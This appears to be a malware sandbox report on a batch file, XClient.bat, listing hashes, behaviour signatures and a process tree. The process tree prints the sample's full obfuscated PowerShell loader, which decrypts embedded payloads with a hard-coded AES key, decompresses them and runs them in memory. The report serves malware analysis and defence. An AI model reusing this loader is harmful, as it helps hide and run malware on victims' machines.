Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 18:07
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240215-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240508-en
17 signatures
150 seconds
General
-
Target
XClient.bat
-
Size
64KB
-
MD5
b9ba38c08e5f9113c31434ae324b3a67
-
SHA1
c5a03303b400dcac370989ba8e51e0b0a3c0622d
-
SHA256
b32ef974fa3195e1e88e290cb4b98f156e8ec3a5a053a8c781ecc2a8e47bf408
-
SHA512
a6960a62f1034441acce040366313c4e70563c4b57c8ca2fa30161e06f6489a86de7af52d3f5c5f69e806a8c0097ed7367e136070f40443cfe73945cb86d099c
-
SSDEEP
768:AO70rJOxpoeQhjCEqvimrMRLdJmmC5UXfs3NadfzteQCv/vFyVzgZpB+20JaaaTg:3CgSGNIfso7tqvFysTTdpePNKaAURYja
Score
1/10
Malware Config
Signatures
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2312 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 2328 wrote to memory of 2204 2328 cmd.exe net.exe PID 2328 wrote to memory of 2204 2328 cmd.exe net.exe PID 2328 wrote to memory of 2204 2328 cmd.exe net.exe PID 2204 wrote to memory of 2208 2204 net.exe net1.exe PID 2204 wrote to memory of 2208 2204 net.exe net1.exe PID 2204 wrote to memory of 2208 2204 net.exe net1.exe PID 2328 wrote to memory of 1028 2328 cmd.exe cmd.exe PID 2328 wrote to memory of 1028 2328 cmd.exe cmd.exe PID 2328 wrote to memory of 1028 2328 cmd.exe cmd.exe PID 2328 wrote to memory of 2312 2328 cmd.exe powershell.exe PID 2328 wrote to memory of 2312 2328 cmd.exe powershell.exe PID 2328 wrote to memory of 2312 2328 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BtOk9w8o5AaasA3bULFmu6lzZU3YsXiJgOkhZu5Ls94='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5VSAd5R0G23+J6h8QdUPsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoEHY=New-Object System.IO.MemoryStream(,$param_var); $xGFrj=New-Object System.IO.MemoryStream; $jBGtG=New-Object System.IO.Compression.GZipStream($JoEHY, [IO.Compression.CompressionMode]::Decompress); $jBGtG.CopyTo($xGFrj); $jBGtG.Dispose(); $JoEHY.Dispose(); $xGFrj.Dispose(); $xGFrj.ToArray();}function execute_function($param_var,$param2_var){ $nZTyZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cFMlz=$nZTyZ.EntryPoint; $cFMlz.Invoke($null, $param2_var);}$DYtQC = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $DYtQC;$vVoJL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DYtQC).Split([Environment]::NewLine);foreach ($wnWAJ in $vVoJL) { if ($wnWAJ.StartsWith('rLSCSMNubfwqFDjMCNvM')) { $KKhqP=$wnWAJ.Substring(20); break; }}$payloads_var=[string[]]$KKhqP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2312-4-0x000007FEF566E000-0x000007FEF566F000-memory.dmpFilesize
4KB
-
memory/2312-5-0x000000001B510000-0x000000001B7F2000-memory.dmpFilesize
2.9MB
-
memory/2312-6-0x0000000002240000-0x0000000002248000-memory.dmpFilesize
32KB
-
memory/2312-7-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-8-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-9-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-10-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-11-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-12-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmpFilesize
9.6MB
-
memory/2312-13-0x000007FEF566E000-0x000007FEF566F000-memory.dmpFilesize
4KB